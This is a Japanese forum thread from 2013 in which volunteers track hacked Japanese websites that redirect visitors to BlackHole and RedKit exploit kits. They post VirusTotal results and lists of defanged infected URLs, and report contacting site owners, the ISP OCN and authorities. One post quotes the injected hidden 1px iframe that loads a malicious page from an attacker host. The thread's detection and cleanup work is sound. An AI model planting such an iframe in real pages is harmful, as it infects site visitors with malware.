Emsisoft Trojan.Html.Fakealert.P (B) 20130511
F-Secure Trojan.Html.Fakealert.P 20130511
GData Trojan.Html.Fakealert.P 20130511
MicroWorld-eScan Trojan.Html.Fakealert.P 20130511
nProtect Trojan.Html.Fakealert.P 20130510
ESETもどきに連れてかれたん
File type: HTML
Detection ratio: 1 / 46
Analysis date: 2013-05-11 18:18:17 UTC
Antivirus Result Update
Norman BlacoleRef.BA 20130511
んで、飛び先のひとつ
File type: HTML
Detection ratio: 6 / 46
Analysis date: 2013-05-11 18:39:21 UTC
Antivirus Result Update
BitDefender Trojan.Html.Fakealert.P 20130511
Emsisoft Trojan.Html.Fakealert.P (B) 20130511
F-Secure Trojan.Html.Fakealert.P 20130511
GData Trojan.Html.Fakealert.P 20130511
MicroWorld-eScan Trojan.Html.Fakealert.P 20130511
nProtect Trojan.Html.Fakealert.P 20130510
ESETもどきに連れてかれたん
72 :名無しさん@お腹いっぱい。:2013/05/14(火) 15:02:24.37
apple-hikkoshi●co●jp/
403、404が改竄されとるんw
ishigo●sytes●net
※電凸済み
403、404が改竄されとるんw
ishigo●sytes●net
※電凸済み
73 :名無しさん@お腹いっぱい。:2013/05/14(火) 15:43:19.30
>>72 コード
<!-- . --><iframe width="1px" height="1px" src="http://ishigo●sytes●net/openstat/appropriate/promise-ourselves●php" style="display:block;" ></iframe><!-- . -->
<!-- . --><iframe width="1px" height="1px" src="http://ishigo●sytes●net/openstat/appropriate/promise-ourselves●php" style="display:block;" ></iframe><!-- . -->
74 :名無しさん@お腹いっぱい。:2013/05/14(火) 17:50:17.38
>>72
修正を確認すた…
修正を確認すた…
75 :/名無しさん[1-30] ◆.htmlint.U :2013/05/14(火) 23:29:00.06
お疲れ様です。
某公益社団法人のサイトがやられていますた。>BlackHole Exploit Kit
おしんにめる済み
某公益社団法人のサイトがやられていますた。>BlackHole Exploit Kit
おしんにめる済み
76 :コテハン ◆8080adndqg :2013/05/14(火) 23:51:58.22
kusuo-o●net
ど う し て こ う な っ た ?
c o m m o n / j s / s c r i p t . j s
ど う し て こ う な っ た ?
c o m m o n / j s / s c r i p t . j s
77 :名無しさん@お腹いっぱい。:2013/05/15(水) 00:20:03.95
gakunavi●net
78 :/名無しさん[1-30] ◆.htmlint.U :2013/05/15(水) 03:33:39.32
>>76-77
どーん
>76
>>75と同じBlackHole Exploit Kit Redirector
ユーザーへのメールは届かなかったみたい。
toやccが多いと不通になるようです。。。
>77
2013-05-07 08:28:11 UTC (日本時間 : 2013/5/07 17:28:11)にはVirusTotalに投げられてますた。
あきた寝る
どーん
>76
>>75と同じBlackHole Exploit Kit Redirector
ユーザーへのメールは届かなかったみたい。
toやccが多いと不通になるようです。。。
>77
2013-05-07 08:28:11 UTC (日本時間 : 2013/5/07 17:28:11)にはVirusTotalに投げられてますた。
あきた寝る
79 :コテハン ◆8080adndqg :2013/05/15(水) 13:52:46.96
80 :コテハン ◆8080adndqg :2013/05/15(水) 18:08:56.74
210●148●117●65/
色々な意味でスゲェw
色々な意味でスゲェw
81 :コテハン ◆8080adndqg :2013/05/15(水) 21:28:52.01
>>76 の件
ミンスから返信
・鯖業者と相談して対応
・JPCERTにはミンス(党本部)から連絡済
とのこと。
kusuo-o●net
>ただいまメンテナンス中です。
>後日公開させていただきます。
見に行ったらメンテ中だた...
ミンスから返信
・鯖業者と相談して対応
・JPCERTにはミンス(党本部)から連絡済
とのこと。
kusuo-o●net
>ただいまメンテナンス中です。
>後日公開させていただきます。
見に行ったらメンテ中だた...
82 :/名無しさん[1-30] ◆.htmlint.U :2013/05/15(水) 23:35:51.92
>>80
逆引きもぁぅぁぅぁー
きゅう電工のWebフォームは漏れのメアドをスパム認定。。。orz......
上流のIIJにつーほー
>>81
他のページやjsは生きてるお フミダイかも
再要請すた。
逆引きもぁぅぁぅぁー
きゅう電工のWebフォームは漏れのメアドをスパム認定。。。orz......
上流のIIJにつーほー
>>81
他のページやjsは生きてるお フミダイかも
再要請すた。
83 :/名無しさん[1-30] ◆.htmlint.U :2013/05/15(水) 23:48:14.51
> 再要請
さくらにつーほ >>6
さくらにつーほ >>6
84 :名無しさん@お腹いっぱい。:2013/05/16(木) 00:23:25.72
85 :コテハン ◆8080adndqg :2013/05/16(木) 00:26:17.37
コテ忘れるし、sageてないし… orz
86 :/名無しさん[1-30] ◆.htmlint.U :2013/05/16(木) 21:47:07.18
87 :/名無しさん[1-30] ◆.htmlint.U :2013/05/23(木) 02:59:40.68
BlackHole Exploit Kit Redirector
検体2通、いくつか宛先不通になってた
1通目は、薬物(Viagra等)販売サイトのドメインがあったので
同じとこ逝く2通目アドレス伏せたけど、中間スクリプトのドメインがNGだったもより orz...........
薬物販売サイトにも罠があるっぽい
File size:[TAB]50.3 KB ( 51517 bytes )
File type:[TAB]HTML
Detection ratio:[TAB] 2 / 47
Analysis date:[TAB] 2013-05-22 16:21:42 UTC
Antivirus [TAB] Result [TAB] Update
Avast [TAB] HTML:Script-inf [TAB] 20130522
GData [TAB] HTML:Script-inf [TAB] 20130522
検体2通、いくつか宛先不通になってた
1通目は、薬物(Viagra等)販売サイトのドメインがあったので
同じとこ逝く2通目アドレス伏せたけど、中間スクリプトのドメインがNGだったもより orz...........
薬物販売サイトにも罠があるっぽい
File size:[TAB]50.3 KB ( 51517 bytes )
File type:[TAB]HTML
Detection ratio:[TAB] 2 / 47
Analysis date:[TAB] 2013-05-22 16:21:42 UTC
Antivirus [TAB] Result [TAB] Update
Avast [TAB] HTML:Script-inf [TAB] 20130522
GData [TAB] HTML:Script-inf [TAB] 20130522
88 :/名無しさん[1-30] ◆.htmlint.U :2013/05/23(木) 03:06:22.26
JaneViewの設定だお>[TAB]
>87やりなおし
File size: 50.3 KB ( 51517 bytes )
File name: pl.txt
File type: HTML
Detection ratio: 2 / 47
Analysis date: 2013-05-22 16:21:42 UTC
Antivirus Result Update
Avast HTML:Script-inf 20130522
GData HTML:Script-inf 20130522
んで感染サイトのスクリプトは
File size: 8.4 KB ( 8624 bytes )
File name: index.html
File type: HTML
Detection ratio: 4 / 47
Analysis date: 2013-05-22 15:50:35 UTC
Antivirus Result Update
Fortinet JS/Iframe.DDG!tr.dldr 20130522
Kaspersky Trojan-Downloader.JS.Iframe.ddr 20130522
McAfee JS/Exploit-Blacole.ht 20130522
NANO-Antivirus Trojan.Script.Expack.bqgmvl
中間スクリプト
File size: 241 bytes ( 241 bytes )
File type: HTML
Detection ratio: 2 / 47
Analysis date: 2013-05-22 16:12:15 UTC
Antivirus Result Update
McAfee Exploit-Rekit.f 20130522
Sophos Troj/ExpJS-II 20130522
>87やりなおし
File size: 50.3 KB ( 51517 bytes )
File name: pl.txt
File type: HTML
Detection ratio: 2 / 47
Analysis date: 2013-05-22 16:21:42 UTC
Antivirus Result Update
Avast HTML:Script-inf 20130522
GData HTML:Script-inf 20130522
んで感染サイトのスクリプトは
File size: 8.4 KB ( 8624 bytes )
File name: index.html
File type: HTML
Detection ratio: 4 / 47
Analysis date: 2013-05-22 15:50:35 UTC
Antivirus Result Update
Fortinet JS/Iframe.DDG!tr.dldr 20130522
Kaspersky Trojan-Downloader.JS.Iframe.ddr 20130522
McAfee JS/Exploit-Blacole.ht 20130522
NANO-Antivirus Trojan.Script.Expack.bqgmvl
中間スクリプト
File size: 241 bytes ( 241 bytes )
File type: HTML
Detection ratio: 2 / 47
Analysis date: 2013-05-22 16:12:15 UTC
Antivirus Result Update
McAfee Exploit-Rekit.f 20130522
Sophos Troj/ExpJS-II 20130522
89 :/名無しさん[1-30] ◆.htmlint.U :2013/05/25(土) 03:41:39.54
90 :/名無しさん[1-30] ◆.htmlint.U :2013/05/27(月) 00:35:42.60
RedKit Exploit Kit Redirector
ランダムな中間スクリプト
File type: HTML
Detection ratio: 3 / 47
Analysis date: 2013-05-26 14:39:38 UTC
McAfee JS/Exploit-Blacole.lt 20130526
McAfee-GW-Edition JS/Exploit-Blacole.lt 20130526
Sophos Troj/ExpJS-II 20130522
まかひとそふぉぉぉぉすががむばってるん
相変わらずこちらの環境ではブツ落とせないままぽ
ランダムな中間スクリプト
File type: HTML
Detection ratio: 3 / 47
Analysis date: 2013-05-26 14:39:38 UTC
McAfee JS/Exploit-Blacole.lt 20130526
McAfee-GW-Edition JS/Exploit-Blacole.lt 20130526
Sophos Troj/ExpJS-II 20130522
まかひとそふぉぉぉぉすががむばってるん
相変わらずこちらの環境ではブツ落とせないままぽ
91 :/名無しさん[1-30] ◆.htmlint.U :2013/05/29(水) 13:33:43.54
92 :/名無しさん[1-30] ◆.htmlint.U :2013/05/29(水) 13:35:56.00
93 :名無しさん@お腹いっぱい。:2013/05/29(水) 22:04:56.53
www●muse●dti●ne●jp/~ohyes/
94 :/名無しさん[1-30] ◆.htmlint.U :2013/05/30(木) 01:50:59.74
95 :/名無しさん[1-30] ◆.htmlint.U :2013/05/31(金) 00:40:02.78
まだ直ってないようですが、
恐らくひげおぢさんがピコーンしたら対応されるかも>93
んで関連
2689367b205c16ce32ed4200942b8b8b1e262dfc70d9bc9fbc77c49699a4f1df/analysis/1166513002/
コメントしてる人やベンダーを責められないと思ふ
ひょっとして>>15なぬかようか
恐らくひげおぢさんがピコーンしたら対応されるかも>93
んで関連
2689367b205c16ce32ed4200942b8b8b1e262dfc70d9bc9fbc77c49699a4f1df/analysis/1166513002/
コメントしてる人やベンダーを責められないと思ふ
ひょっとして>>15なぬかようか
96 :/名無しさん[1-30] ◆.htmlint.U :2013/05/31(金) 13:55:45.14
>>95
MD5: 444bcb3a3fcf8389296c49467f27e1d6
http://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Ejaipa%2Eor%2Ejp%2Fevent%2Foki%5Fict2011%2F111215%5Fmicrosoft%5Fhan%2Epdf
MD5: 444bcb3a3fcf8389296c49467f27e1d6
http://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Ejaipa%2Eor%2Ejp%2Fevent%2Foki%5Fict2011%2F111215%5Fmicrosoft%5Fhan%2Epdf
97 :名無しさん@お腹いっぱい。:2013/06/02(日) 11:58:43.02
www●trajal●net/k-b●html
www●f-airline●com/
lukes-world●co●jp/
www2●patt●gr●jp/~ryo/
www●f-airline●com/
lukes-world●co●jp/
www2●patt●gr●jp/~ryo/
98 :名無しさん@お腹いっぱい。:2013/06/02(日) 12:18:40.44
松浦とみよし 市議会議員
www4●ocn●ne●jp/~tomiyosi/
連絡したのにこの状態。。。
www4●ocn●ne●jp/~tomiyosi/
連絡したのにこの状態。。。
99 :/名無しさん[1-30] ◆.htmlint.U :2013/06/03(月) 07:57:15.43
100 :名無しさん@お腹いっぱい。:2013/06/04(火) 23:11:04.06
申告しても対処しないサイト
www●yanagita-kk●co●jp/
www10●ocn●ne●jp/~kuushuu/ussbsindex●html
www●arpak-cdc●co●jp/
w01●tp1●jp/~a541677231/
nanaplan●jp/kako_kenngakusai●html
ir06●com/
www●garage-yamato●com/
www●fp-kazuna●com/insu/
www1●hinocatv●ne●jp/baba/
harakirievent●toypark●in/
www●yanagita-kk●co●jp/
www10●ocn●ne●jp/~kuushuu/ussbsindex●html
www●arpak-cdc●co●jp/
w01●tp1●jp/~a541677231/
nanaplan●jp/kako_kenngakusai●html
ir06●com/
www●garage-yamato●com/
www●fp-kazuna●com/insu/
www1●hinocatv●ne●jp/baba/
harakirievent●toypark●in/
101 :名無しさん@お腹いっぱい。:2013/06/04(火) 23:13:15.28
archivo-semiotica●com/
www●dorf●co●jp/access●html
www●utsunomiya-es●com/
mado-works●com/staff●html
www●86919●com/
xn--n8jxcwb2fra8229bokzg●com/
angelstone●co●jp/
bbs-beppin●com
www●presen●co●jp/SERV●html
harmony8●com
g2g2●jp/
caiquesarepeopletoo●com/
cairo123●com/
www●antwarp●jp/souvenir/monthly_select/
www●dorf●co●jp/access●html
www●utsunomiya-es●com/
mado-works●com/staff●html
www●86919●com/
xn--n8jxcwb2fra8229bokzg●com/
angelstone●co●jp/
bbs-beppin●com
www●presen●co●jp/SERV●html
harmony8●com
g2g2●jp/
caiquesarepeopletoo●com/
cairo123●com/
www●antwarp●jp/souvenir/monthly_select/
102 :名無しさん@お腹いっぱい。:2013/06/06(木) 00:02:14.13
103 :名無しさん@お腹いっぱい。:2013/06/06(木) 18:43:47.73
104 :名無しさん@お腹いっぱい。:2013/06/06(木) 18:51:12.95
>>103
残権に関しては、警視庁のお手並み拝見ということで撤収
残権に関しては、警視庁のお手並み拝見ということで撤収
105 :名無しさん@お腹いっぱい。:2013/06/06(木) 21:11:02.86
何ヶ月も放置する駄目なOCNのユーザが大量感染
OCNはあてにならないので直接ユーザのメルアドに警告中。
メルアドがないのを助けてください
www1●ocn●ne●jp/~ganja/
www1●ocn●ne●jp/~oohata/
www1●ocn●ne●jp/~takano8/
www11●ocn●ne●jp/~uten/
www12●ocn●ne●jp/~kaido/rw/
OCNはあてにならないので直接ユーザのメルアドに警告中。
メルアドがないのを助けてください
www1●ocn●ne●jp/~ganja/
www1●ocn●ne●jp/~oohata/
www1●ocn●ne●jp/~takano8/
www11●ocn●ne●jp/~uten/
www12●ocn●ne●jp/~kaido/rw/
106 :名無しさん@お腹いっぱい。:2013/06/06(木) 21:33:28.35
www14●ocn●ne●jp/~yu4127/
www15●ocn●ne●jp/~nakanoah/
www15●ocn●ne●jp/~toshikaz/
www15●ocn●ne●jp/~vento/
www17●ocn●ne●jp/~skynet/
www18●ocn●ne●jp/~answer/
www18●ocn●ne●jp/~cos/
www15●ocn●ne●jp/~nakanoah/
www15●ocn●ne●jp/~toshikaz/
www15●ocn●ne●jp/~vento/
www17●ocn●ne●jp/~skynet/
www18●ocn●ne●jp/~answer/
www18●ocn●ne●jp/~cos/
107 :名無しさん@お腹いっぱい。:2013/06/06(木) 23:26:08.97
40件はHPのメルアドに警告完了
wwww2●ocn●ne●jp/~esi/
www18●ocn●ne●jp/~myouga/
www2●ocn●ne●jp/~littleb/
www2●ocn●ne●jp/~seafood/
www2●ocn●ne●jp/~skbld/
www2●ocn●ne●jp/~suwan/
www3●ocn●ne●jp/~charinko/
www3●ocn●ne●jp/~nino38/
wwww2●ocn●ne●jp/~esi/
www18●ocn●ne●jp/~myouga/
www2●ocn●ne●jp/~littleb/
www2●ocn●ne●jp/~seafood/
www2●ocn●ne●jp/~skbld/
www2●ocn●ne●jp/~suwan/
www3●ocn●ne●jp/~charinko/
www3●ocn●ne●jp/~nino38/
108 :名無しさん@お腹いっぱい。:2013/06/06(木) 23:30:15.76
www4●ocn●ne●jp/~htgifu/
www8●ocn●ne●jp/~bito/
www8●ocn●ne●jp/~gzwave/
www8●ocn●ne●jp/~k-chico/
www9●ocn●ne●jp/~alingo/
www8●ocn●ne●jp/~bito/
www8●ocn●ne●jp/~gzwave/
www8●ocn●ne●jp/~k-chico/
www9●ocn●ne●jp/~alingo/
109 :/名無しさん[1-30] ◆.htmlint.U :2013/06/07(金) 05:56:19.42
皆様お疲れ様です。
>>105-108
以前の分でおしんにめる届いてたっぽいので纏めてつーほ
フォームどーすべ
>>104
なので診ませんですた。>>100-101
目がイタイのでしばしリタイア
さいとあどばいざがgdgd。。。orz............
>>105-108
以前の分でおしんにめる届いてたっぽいので纏めてつーほ
フォームどーすべ
>>104
なので診ませんですた。>>100-101
目がイタイのでしばしリタイア
さいとあどばいざがgdgd。。。orz............
110 :オルティス・ジャパン:2013/06/07(金) 18:11:49.68
>>109
お大事に
>>105-108
連絡完了
OCNの中の人へ
対応窓口を誰にも分かるよう明確に、対応フローをしっかりとね
ついでに↓も見ておくといいかも
jpサート http://www.jpcert.or.jp/
Web サイト改ざんに関する注意喚起
http://www.jpcert.or.jp/at/2013/at130027.html
IPA https://www.ipa.go.jp/
2013年6月の呼びかけ「ウェブサイトが改ざんされないように対策を!」を公開しました。
https://www.ipa.go.jp/security/txt/2013/06outline.html
「ガンブラー」事件に匹敵するWeb改ざん報告、IPAが対策徹底を呼び掛け
http://www.itmedia.co.jp/enterprise/articles/1306/04/news108.html
[データ] 「Webサイト改ざん」が急増、「ガンブラー」流行時に匹敵、IPAまとめ
http://bizmash.jp/articles/45655.html
国内サイト20件以上で、政治的な改ざんが発生 - 扇動しており規模拡大に警戒を
http://www.security-next.com/040525
国内Webサイト改ざん事例続報:攻撃手法の詳細と得られる対策の教訓
http://blog.trendmicro.co.jp/archives/7367
国内のWebサイトの改ざんが拡大中 | トレンドマイクロ セキュリティ ブログ ...
http://blog.trendmicro.co.jp/archives/3317
日本のWebサイト狙った改ざん攻撃に注意 - トレンドマイクロ
http://news.mynavi.jp/news/2013/05/31/282/index.html
国内Webサイト改ざん事例、攻撃手法の詳細が判明 ― トレンドマイクロ
http://is702.jp/news/1369/partner/101_g/
お大事に
>>105-108
連絡完了
OCNの中の人へ
対応窓口を誰にも分かるよう明確に、対応フローをしっかりとね
ついでに↓も見ておくといいかも
jpサート http://www.jpcert.or.jp/
Web サイト改ざんに関する注意喚起
http://www.jpcert.or.jp/at/2013/at130027.html
IPA https://www.ipa.go.jp/
2013年6月の呼びかけ「ウェブサイトが改ざんされないように対策を!」を公開しました。
https://www.ipa.go.jp/security/txt/2013/06outline.html
「ガンブラー」事件に匹敵するWeb改ざん報告、IPAが対策徹底を呼び掛け
http://www.itmedia.co.jp/enterprise/articles/1306/04/news108.html
[データ] 「Webサイト改ざん」が急増、「ガンブラー」流行時に匹敵、IPAまとめ
http://bizmash.jp/articles/45655.html
国内サイト20件以上で、政治的な改ざんが発生 - 扇動しており規模拡大に警戒を
http://www.security-next.com/040525
国内Webサイト改ざん事例続報:攻撃手法の詳細と得られる対策の教訓
http://blog.trendmicro.co.jp/archives/7367
国内のWebサイトの改ざんが拡大中 | トレンドマイクロ セキュリティ ブログ ...
http://blog.trendmicro.co.jp/archives/3317
日本のWebサイト狙った改ざん攻撃に注意 - トレンドマイクロ
http://news.mynavi.jp/news/2013/05/31/282/index.html
国内Webサイト改ざん事例、攻撃手法の詳細が判明 ― トレンドマイクロ
http://is702.jp/news/1369/partner/101_g/
111 :名無しさん@お腹いっぱい。:2013/06/08(土) 05:54:44.41
>>105-108 知ってるとこあって驚いた。どうやってこんなに大量に感染サイトを見つけてくるんですか?
112 :名無しさん@お腹いっぱい。:2013/06/08(土) 11:25:10.36
ブラウザがブロックする元の情報となっている
stopbadware です。
stopbadware です。
113 :オルティス・ジャパン:2013/06/08(土) 13:44:30.41
114 :名無しさん@お腹いっぱい。:2013/06/09(日) 10:28:15.23
ISPはOCNでだらしのないAbuseだし
何度もユーザにメールしても放置。
pacific-ocean●co●jp/
何度もユーザにメールしても放置。
pacific-ocean●co●jp/
115 :/名無しさん[1-30] ◆.htmlint.U :2013/06/09(日) 15:54:22.38
あいぴーあどれすも ぁぅぁぅ
116 :名無しさん@お腹いっぱい。:2013/06/09(日) 19:23:44.92
icweb●jp/~mantashokudo/
www●fp-kazuna●com/insu/
showa-ts●co●jp/
www1●ocn●ne●jp/~niryo/
www32●ocn●ne●jp/~sirotaya/
www●fp-kazuna●com/insu/
showa-ts●co●jp/
www1●ocn●ne●jp/~niryo/
www32●ocn●ne●jp/~sirotaya/
117 :名無しさん@お腹いっぱい。:2013/06/09(日) 19:27:11.63
www4●ocn●ne●jp/~music-wa/
www6●ocn●ne●jp/~guuska/rink●htm
www6●ocn●ne●jp/~sumika/
www8●ocn●ne●jp/~waga/
www6●ocn●ne●jp/~guuska/rink●htm
www6●ocn●ne●jp/~sumika/
www8●ocn●ne●jp/~waga/
118 :/名無しさん[1-30] ◆.htmlint.U :2013/06/10(月) 06:00:10.72
おぱようごぜぇやす
くこまでメルとかしまひた
補足
>>116にもあいぴーあどれす ぁぅぁぅがありますた
んで、いちばんすた、外部さいとが ぁぅぁぅ こりもつーほ
>>117のいちばんすた、壊れてるけどAviraがぴこーん
くこまでメルとかしまひた
補足
>>116にもあいぴーあどれす ぁぅぁぅがありますた
んで、いちばんすた、外部さいとが ぁぅぁぅ こりもつーほ
>>117のいちばんすた、壊れてるけどAviraがぴこーん
119 :コテハン ◆8080adndqg :2013/06/10(月) 13:48:32.30
今北三g・・・ orz
120 :オルティス・ジャパン:2013/06/10(月) 18:01:56.25
OCNはこのスレを巡回リストに入れたとの事なので自助努力して貰いましょう
つまり、このスレのOCNの改ざんサイトは、OCNが自主的に対応するということです
あんまり頑張り過ぎると禿げたり目が痛くなるので少しは楽をしましょう>>all
>>110
追加
5月末に急増した改ざん、「IISサーバ」が標的か - 「Gumblar」と類似点
http://www.security-next.com/040688
つまり、このスレのOCNの改ざんサイトは、OCNが自主的に対応するということです
あんまり頑張り過ぎると禿げたり目が痛くなるので少しは楽をしましょう>>all
>>110
追加
5月末に急増した改ざん、「IISサーバ」が標的か - 「Gumblar」と類似点
http://www.security-next.com/040688
121 :オルティス・ジャパン:2013/06/10(月) 19:42:55.95
とはいえ>>113の>>110
@のganja ← これはHPの所有者に電話したので閉鎖されている様ですが
Aoohataは対応されていません
おそらくOCNは口先だけなのでしょうね
なので、警視庁サイバー犯罪対策課の方
お話した通り逮捕しちゃってください
@のganja ← これはHPの所有者に電話したので閉鎖されている様ですが
Aoohataは対応されていません
おそらくOCNは口先だけなのでしょうね
なので、警視庁サイバー犯罪対策課の方
お話した通り逮捕しちゃってください
122 :名無しさん@お腹いっぱい。:2013/06/10(月) 21:58:40.03
申告したものも真面に対応できないOCNが。。。
デタラメでしょうね。
昔に、出会い系サイトにたいし警察から警告を受けたホスティング屋が
対応が遅かったりしなかったとして幇助で捕まったことがありましたが
本当に逮捕してくれるといいですね。OCNだと良い刺激になるでしょう
デタラメでしょうね。
昔に、出会い系サイトにたいし警察から警告を受けたホスティング屋が
対応が遅かったりしなかったとして幇助で捕まったことがありましたが
本当に逮捕してくれるといいですね。OCNだと良い刺激になるでしょう
123 :名無しさん@お腹いっぱい。:2013/06/10(月) 22:05:06.38
そういえばOCNのメアドがわかる29サイトには、直接警告しましたが
50%は2日で対処している。OCNの案内は対処の仕方の案内が駄目なんでしょうね。
期限も切って表示停止にもできないチキンがOCNということでしょう
50%は2日で対処している。OCNの案内は対処の仕方の案内が駄目なんでしょうね。
期限も切って表示停止にもできないチキンがOCNということでしょう
124 :名無しさん@お腹いっぱい。:2013/06/11(火) 00:32:19.70
>>105
>>106
別経由で連絡先わかったとこに電凸。
ほとんど皆さんからの警告も、OCNからの警告も気づいてないです。
むしろ、こっちが疑われて「この電話番号を警察に言う」とか逆切れされた(泣)
やっぱりおしんに元から強制排除してもらうのがいいかもしんない。
>>106
別経由で連絡先わかったとこに電凸。
ほとんど皆さんからの警告も、OCNからの警告も気づいてないです。
むしろ、こっちが疑われて「この電話番号を警察に言う」とか逆切れされた(泣)
やっぱりおしんに元から強制排除してもらうのがいいかもしんない。
125 :/名無しさん[1-30] ◆.htmlint.U :2013/06/11(火) 04:09:27.00
> システムメンテナンス作業に伴うサービス停止のお知らせ
>
> ただ今、システムメンテナンス中のため、
> 弊社ホームページをご利用いただけません。
>
> ご不便おかけしますが、しばらくお待ちください。
ガ━━━━━━(゚д゚lll)━━━━━━ン
>
> ただ今、システムメンテナンス中のため、
> 弊社ホームページをご利用いただけません。
>
> ご不便おかけしますが、しばらくお待ちください。
ガ━━━━━━(゚д゚lll)━━━━━━ン
126 :/名無しさん[1-30] ◆.htmlint.U :2013/06/11(火) 04:22:07.85
127 :/名無しさん[1-30] ◆.htmlint.U :2013/06/11(火) 08:01:38.68
128 :/名無しさん[1-30] ◆.htmlint.U :2013/06/11(火) 16:38:08.62
復帰カキコ
頭隠して尻隠さず ってのが某所にあるぽ
フミダイかなん
頭隠して尻隠さず ってのが某所にあるぽ
フミダイかなん
129 :名無しさん@お腹いっぱい。:2013/06/11(火) 16:50:05.48
operation name:hyaena
http://engawa.2ch.net/test/read.cgi/isp/1370760773/
http://engawa.2ch.net/test/read.cgi/isp/1370760773/
130 :名無しさん@お腹いっぱい。:2013/06/11(火) 21:48:45.60
いやービックリ!あのOCNが本当に止めましたよ。
それでは、OCNさん以下も止めてください
www1●ocn●ne●jp/~niryo/
www32●ocn●ne●jp/~sirotaya/
www4●ocn●ne●jp/~music-wa/
www6●ocn●ne●jp/~guuska/rink●htm
www6●ocn●ne●jp/~sumika/
www8●ocn●ne●jp/~waga/
www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm
www17●ocn●ne●jp/~skynet/
それでは、OCNさん以下も止めてください
www1●ocn●ne●jp/~niryo/
www32●ocn●ne●jp/~sirotaya/
www4●ocn●ne●jp/~music-wa/
www6●ocn●ne●jp/~guuska/rink●htm
www6●ocn●ne●jp/~sumika/
www8●ocn●ne●jp/~waga/
www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm
www17●ocn●ne●jp/~skynet/
131 :名無しさん@お腹いっぱい。:2013/06/11(火) 21:50:10.28
www1●ocn●ne●jp/~agraph/
www1●ocn●ne●jp/~pageone/
www10●ocn●ne●jp/~akachanf/
www11●ocn●ne●jp/~gen0929/
www13●ocn●ne●jp/~yaesu/
www15●ocn●ne●jp/~yktk/
www17●ocn●ne●jp/~omura/
www1●ocn●ne●jp/~pageone/
www10●ocn●ne●jp/~akachanf/
www11●ocn●ne●jp/~gen0929/
www13●ocn●ne●jp/~yaesu/
www15●ocn●ne●jp/~yktk/
www17●ocn●ne●jp/~omura/
132 :名無しさん@お腹いっぱい。:2013/06/11(火) 21:51:12.38
www18●ocn●ne●jp/~b-miz/
www2●ocn●ne●jp/~kyowawin/
www2●ocn●ne●jp/~stkr/
www4●ocn●ne●jp/~sakura77/
www8●ocn●ne●jp/~daitou/
以下はリダイレクトページ
www17●ocn●ne●jp/~addtech/
www17●ocn●ne●jp/~kinsicho/
www2●ocn●ne●jp/~kyowawin/
www2●ocn●ne●jp/~stkr/
www4●ocn●ne●jp/~sakura77/
www8●ocn●ne●jp/~daitou/
以下はリダイレクトページ
www17●ocn●ne●jp/~addtech/
www17●ocn●ne●jp/~kinsicho/
133 :名無しさん@お腹いっぱい。:2013/06/11(火) 21:52:18.91
OCNを動かしてくれた皆さん感謝です。
これも明日止まることを期待。。。
これも明日止まることを期待。。。
134 :名無しさん@お腹いっぱい。:2013/06/12(水) 02:31:38.43
それは無理かと
準備期間が必要でしょ(確認作業+連絡+猶予期間等々)
準備期間が必要でしょ(確認作業+連絡+猶予期間等々)
135 :/名無しさん[1-30] ◆.htmlint.U :2013/06/12(水) 02:54:48.97
136 :名無しさん@お腹いっぱい。:2013/06/12(水) 21:47:14.90
新規
www11●ocn●ne●jp/~sayacha/
www5●ocn●ne●jp/~fukuzen/
www7●ocn●ne●jp/~sclamp/
再感染(それも初めて見たパターン 新種?)
www16●ocn●ne●jp/~chesnuts/
Toppageだけ対処
www14●ocn●ne●jp/~teamf/touroku●html
www17●ocn●ne●jp/~clover4/cosmet_hair●html
www5●ocn●ne●jp/~sfuru/houshu/houshu_menu●htm
www8●ocn●ne●jp/~aikamu/company●html
www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm
www11●ocn●ne●jp/~sayacha/
www5●ocn●ne●jp/~fukuzen/
www7●ocn●ne●jp/~sclamp/
再感染(それも初めて見たパターン 新種?)
www16●ocn●ne●jp/~chesnuts/
Toppageだけ対処
www14●ocn●ne●jp/~teamf/touroku●html
www17●ocn●ne●jp/~clover4/cosmet_hair●html
www5●ocn●ne●jp/~sfuru/houshu/houshu_menu●htm
www8●ocn●ne●jp/~aikamu/company●html
www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm
137 :名無しさん@お腹いっぱい。:2013/06/13(木) 00:02:58.92
サーキュレーター探してたらいきなりMSEが開いた。
トロイの木馬ってのを検出して自動で削除画面が出る。
更新しても、そのたびに出る。
俺だけ?それともこの会社のページがだれかにやられたの?
株式会社ナカトミ | 45cm工場扇 OPF-45S
http://www.nakatomi-sangyo.com/fan/opf-45s.html
トロイの木馬ってのを検出して自動で削除画面が出る。
更新しても、そのたびに出る。
俺だけ?それともこの会社のページがだれかにやられたの?
株式会社ナカトミ | 45cm工場扇 OPF-45S
http://www.nakatomi-sangyo.com/fan/opf-45s.html
138 :名無しさん@お腹いっぱい。:2013/06/13(木) 00:06:50.10
Trojan:JS BlacoleRef.CZ
と名前はでてる
他にも一緒に入れられる?MSEはそれしか検出してないんだけど
と名前はでてる
他にも一緒に入れられる?MSEはそれしか検出してないんだけど
139 :名無しさん@お腹いっぱい。:2013/06/13(木) 00:25:03.38
誤検出っぽい。お騒がせした。
140 :/名無しさん[1-30] ◆.htmlint.U :2013/06/13(木) 02:07:47.53
Aviraがピコーン
つーほー作業に入ります。。。
つーほー作業に入ります。。。
141 :/名無しさん[1-30] ◆.htmlint.U :2013/06/13(木) 04:10:57.80
つーほすた
142 :名無しさん@お腹いっぱい。:2013/06/14(金) 08:09:48.69
www●horizonz●co●jp
satochokusen●co●jp
satochokusen●co●jp
143 :オルティス・ジャパン:2013/06/14(金) 18:11:52.51
>>130-132,136
なかなか対応されないので電話してみました
訃報です
OCNはこのスレの巡回を止めたそうです
正規のフロー(フォームから)に従って連絡があれば対応するとのこと
お問い合わせフォーム
http s:// cgi01.ocn.ne.jp/support/abuse/blog.html
今回は罪滅ぼしの意味合いで私がフォーム発射&完了
&担当部署(セキュリティ)に電話
なかなか対応されないので電話してみました
訃報です
OCNはこのスレの巡回を止めたそうです
正規のフロー(フォームから)に従って連絡があれば対応するとのこと
お問い合わせフォーム
http s:// cgi01.ocn.ne.jp/support/abuse/blog.html
今回は罪滅ぼしの意味合いで私がフォーム発射&完了
&担当部署(セキュリティ)に電話
144 :/名無しさん[1-30] ◆.htmlint.U :2013/06/14(金) 18:38:13.90
145 :/名無しさん[1-30] ◆.htmlint.U :2013/06/15(土) 04:54:48.05
閑話休題 漏れがVTに投げた懐かしの8080
